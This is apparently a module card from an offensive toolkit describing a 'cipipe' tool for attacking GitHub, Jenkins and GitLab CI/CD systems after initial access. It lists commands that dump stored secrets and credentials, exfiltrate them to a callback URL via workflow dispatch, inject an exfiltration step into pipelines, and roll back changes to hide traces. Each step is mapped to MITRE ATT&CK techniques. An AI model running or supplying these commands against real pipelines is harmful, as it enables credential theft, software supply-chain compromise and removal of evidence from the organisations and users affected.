cicd-attacks
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
| Field | Value |
|---|---|
| name | cicd-attacks |
| description | CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab |
| category | post-exploitation |
| tags | ["cicd","github-actions","jenkins","gitlab","pipeline","supply-chain","secret-extraction","credential-access"] |
| tech_stack | ["github","jenkins","gitlab","python","requests"] |
| cwe_ids | ["CWE-522","CWE-693","CWE-829","CWE-284"] |
| chains_with | ["T1195.002","T1552.004","T1059","T1098"] |
| prerequisites | ["T1078"] |
| version | 1.0 |
CI/CD pipeline attacks target the software delivery infrastructure to extract secrets, inject malicious code, and establish persistence. Once access to GitHub, Jenkins, or GitLab has been obtained, these tools extract stored credentials, inject pipeline steps for secret exfiltration, and manipulate workflow configurations.
```bash
pip3 install requests

# Quick prerequisite check — GitHub
curl -s -H "Authorization: Bearer $GITHUB_TOKEN" https://api.github.com/user | jq .login
# Quick prerequisite check — Jenkins
curl -s -u "$JENKINS_USER:$JENKINS_TOKEN" "$JENKINS_URL/api/json" | jq .nodeDescription
# Quick prerequisite check — GitLab
curl -s -H "Private-Token: $GITLAB_TOKEN" "$GITLAB_URL/api/v4/user" | jq .username
```
| Action | Command | Purpose |
|---|---|---|
| List GitHub secrets | cipipe gh_secrets --repo OWNER/REPO --method list | Enumerate repository and environment secret names |
| Jenkins credentials | cipipe jenkins_creds --url URL --method api | List credential store entries |
| GitLab variables | cipipe gitlab_tokens --url URL --project-id ID | Enumerate CI/CD variables and tokens |
| Action | Command | Purpose |
|---|---|---|
| GitHub dispatch | cipipe gh_secrets --repo OWNER/REPO --method dispatch --callback-url URL | Exfiltrate secrets via workflow dispatch |
| Jenkins console | cipipe jenkins_creds --url URL --method console | Extract credentials via Groovy Script Console |
| GitHub logs | cipipe gh_secrets --repo OWNER/REPO --method logs | Search workflow logs for leaked secrets |
| Action | Command | Purpose |
|---|---|---|
| Inject pipeline | cipipe pipeline_inject --repo OWNER/REPO --callback-url URL | Add exfiltration step to CI/CD pipeline |
```bash
cipipe cleanup_ci
```
| Program | Technique | MITRE ATT&CK |
|---|---|---|
| gh_secrets | GitHub Actions secret extraction | T1552.004 — Private Keys |
| jenkins_creds | Jenkins credential dump | T1555 — Credentials from Password Stores |
| pipeline_inject | CI/CD pipeline injection | T1195.002 — Compromise Software Supply Chain |
| gitlab_tokens | GitLab CI/CD variable extraction | T1552.004 — Private Keys |
| cleanup_ci | Pipeline modification rollback | T1070 — Indicator Removal |